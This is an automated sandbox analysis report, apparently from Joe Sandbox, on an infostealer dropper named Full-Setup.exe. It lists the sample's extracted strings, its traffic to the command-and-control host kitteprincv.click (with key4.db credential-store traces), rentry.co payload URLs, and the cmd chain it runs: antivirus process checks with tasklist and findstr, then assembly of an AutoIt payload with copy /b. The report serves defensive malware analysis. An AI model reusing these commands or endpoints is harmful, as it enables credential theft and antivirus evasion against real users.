        Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
        Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: Full-Setup.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
        Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
        Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
        Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
        Source: powershell.exe, 0000000F.00000002.2395086529.0000000004E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
        Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
        Source: Glow.com, 0000000A.00000000.1729969732.0000000000455000.00000002.00000001.01000000.00000006.sdmp, Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Problems.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
        Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
        Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
        Source: Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: powershell.exe, 0000000F.00000002.2395086529.0000000004E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
        Source: Glow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
        Source: Glow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
        Source: Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: Glow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
        Source: Glow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
        Source: Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: Glow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
        Source: Glow.com, 0000000A.00000002.2492595373.0000000001388000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kitteprincv.click/api1)
        Source: Glow.com, 0000000A.00000002.2492595373.0000000001388000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kitteprincv.click/pia)
        Source: Glow.com, 0000000A.00000002.2492761826.00000000014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kitteprincv.click:443/api
        Source: Glow.com, 0000000A.00000002.2492761826.00000000014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kitteprincv.click:443/api4p.default-release/key4.dbPK
        Source: Glow.com, 0000000A.00000002.2492761826.00000000014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kitteprincv.click:443/apiH111H65H70H121H113H109H98H111H98H117H106H112H111H65H66H101H119H102H
        Source: Glow.com, 0000000A.00000002.2492761826.00000000014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kitteprincv.click:443/apitxtPK
        Source: powershell.exe, 0000000F.00000002.2395086529.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.0000000004FD9000.00000004.00000800.00020000.00000000.sdmp, 4VQOL9Z4BW428506NY343FUN.ps1.10.drString found in binary or memory: https://rentry.co/
        Source: powershell.exe, 0000000F.00000002.2395086529.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.00000000051EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/hZ
        Source: 4VQOL9Z4BW428506NY343FUN.ps1.10.drString found in binary or memory: https://rentry.co/static/icons/512.png
        Source: powershell.exe, 0000000F.00000002.2395086529.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.00000000051EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/512.pnghZ
        Source: powershell.exe, 0000000F.00000002.2395086529.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.0000000004FD9000.00000004.00000800.00020000.00000000.sdmp, 4VQOL9Z4BW428506NY343FUN.ps1.10.drString found in binary or memory: https://rentry.co/what
        Source: powershell.exe, 0000000F.00000002.2395086529.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.00000000051EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/whathZ
        Source: Glow.com, 0000000A.00000002.2492761826.00000000014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.co:443/feouewe5/raw
        Source: Glow.com, 0000000A.00000003.2215505651.0000000004922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
        Source: Glow.com, 0000000A.00000003.2262531789.0000000005B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
        Source: Glow.com, 0000000A.00000003.2262531789.0000000005B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
        Source: Glow.com, 0000000A.00000003.2215505651.0000000004922000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215604698.0000000001775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
        Source: Glow.com, 0000000A.00000003.2215604698.0000000001750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
        Source: Glow.com, 0000000A.00000003.2215505651.0000000004922000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215604698.0000000001775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
        Source: Glow.com, 0000000A.00000003.2215604698.0000000001750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
        Source: Glow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
        Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
        Source: Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: Glow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
        Source: Environments.0.drString found in binary or memory: https://www.globalsign.com/repository/0
        Source: Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: powershell.exe, 0000000F.00000002.2395086529.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.0000000004FD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.00000000051EE000.00000004.00000800.00020000.00000000.sdmp, 4VQOL9Z4BW428506NY343FUN.ps1.10.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-LLFSDKZXET
        Source: Glow.com, 0000000A.00000003.2262531789.0000000005B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
        Source: Glow.com, 0000000A.00000003.2262531789.0000000005B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
        Source: Glow.com, 0000000A.00000003.2262531789.0000000005B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
        Source: Glow.com, 0000000A.00000003.2262531789.0000000005B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
        Source: Glow.com, 0000000A.00000003.2262531789.0000000005B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: unknownHTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49738 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49739 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49740 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49741 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49743 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49750 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49756 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49767 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.4:49773 version: TLS 1.2
        Source: C:\Users\user\Desktop\Full-Setup.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003FF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_003FF7C7
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003FF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_003FF55C
        Source: C:\Users\user\Desktop\Full-Setup.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_00419FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_00419FD2
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003F4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,10_2_003F4763
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003E1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_003E1B4D
        Source: C:\Users\user\Desktop\Full-Setup.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_004038AF
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003EF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_003EF20D
        Source: C:\Users\user\Desktop\Full-Setup.exeFile created: C:\Windows\AolSwimJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeFile created: C:\Windows\ReferredWarrantiesJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeFile created: C:\Windows\TeachesFairlyJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeFile created: C:\Windows\SalemRecognizeJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeFile created: C:\Windows\BoatsMethodJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeFile created: C:\Windows\WorkedOnJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeFile created: C:\Windows\LatinoEvansJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeFile created: C:\Windows\DeanExcitementJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeCode function: 0_2_0040737E0_2_0040737E
        Source: C:\Users\user\Desktop\Full-Setup.exeCode function: 0_2_00406EFE0_2_00406EFE
        Source: C:\Users\user\Desktop\Full-Setup.exeCode function: 0_2_004079A20_2_004079A2
        Source: C:\Users\user\Desktop\Full-Setup.exeCode function: 0_2_004049A80_2_004049A8
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003A801710_2_003A8017
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_0039E14410_2_0039E144
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_0038E1F010_2_0038E1F0
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003BA26E10_2_003BA26E
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003822AD10_2_003822AD
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003A22A210_2_003A22A2
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_0039C62410_2_0039C624
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003BE87F10_2_003BE87F
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_0040C8A410_2_0040C8A4
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003F2A0510_2_003F2A05
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003B6ADE10_2_003B6ADE
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003E8BFF10_2_003E8BFF
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_0039CD7A10_2_0039CD7A
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003ACE1010_2_003ACE10
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003B715910_2_003B7159
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_0038924010_2_00389240
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_0041531110_2_00415311
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003896E010_2_003896E0
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003A170410_2_003A1704
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003A1A7610_2_003A1A76
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_00389B6010_2_00389B60
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003A7B8B10_2_003A7B8B
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003A1D2010_2_003A1D20
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003A7DBA10_2_003A7DBA
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003A1FE710_2_003A1FE7
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\600044\Glow.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: String function: 003A0DA0 appears 46 times
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: String function: 0039FD52 appears 40 times
        Source: C:\Users\user\Desktop\Full-Setup.exeCode function: String function: 004062CF appears 58 times
        Source: Full-Setup.exeStatic PE information: invalid certificate
        Source: Full-Setup.exe, 00000000.00000002.1805973468.00000000006B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs Full-Setup.exe
        Source: Full-Setup.exe, 00000000.00000003.1805228299.00000000006B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs Full-Setup.exe
        Source: Full-Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/27@3/2
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003F41FA GetLastError,FormatMessageW,10_2_003F41FA
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003E2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_003E2010
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003E1A0B AdjustTokenPrivileges,CloseHandle,10_2_003E1A0B
        Source: C:\Users\user\Desktop\Full-Setup.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003EDD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,10_2_003EDD87
        Source: C:\Users\user\Desktop\Full-Setup.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003F3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,10_2_003F3A0E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
        Source: C:\Users\user\Desktop\Full-Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsf4E1D.tmpJump to behavior
        Source: Full-Setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSystem information queried: HandleInformationJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Users\user\Desktop\Full-Setup.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: Glow.com, 0000000A.00000003.2240602057.0000000004884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: Full-Setup.exeVirustotal: Detection: 59%
        Source: Full-Setup.exeReversingLabs: Detection: 57%
        Source: C:\Users\user\Desktop\Full-Setup.exeFile read: C:\Users\user\Desktop\Full-Setup.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Full-Setup.exe "C:\Users\user\Desktop\Full-Setup.exe"
        Source: C:\Users\user\Desktop\Full-Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Spare Spare.cmd && Spare.cmd
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 600044
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Mary" Exploring
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Cancel + ..\Mag + ..\Investment + ..\Pee + ..\Condition + ..\Shopzilla + ..\Mention k
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600044\Glow.com Glow.com k
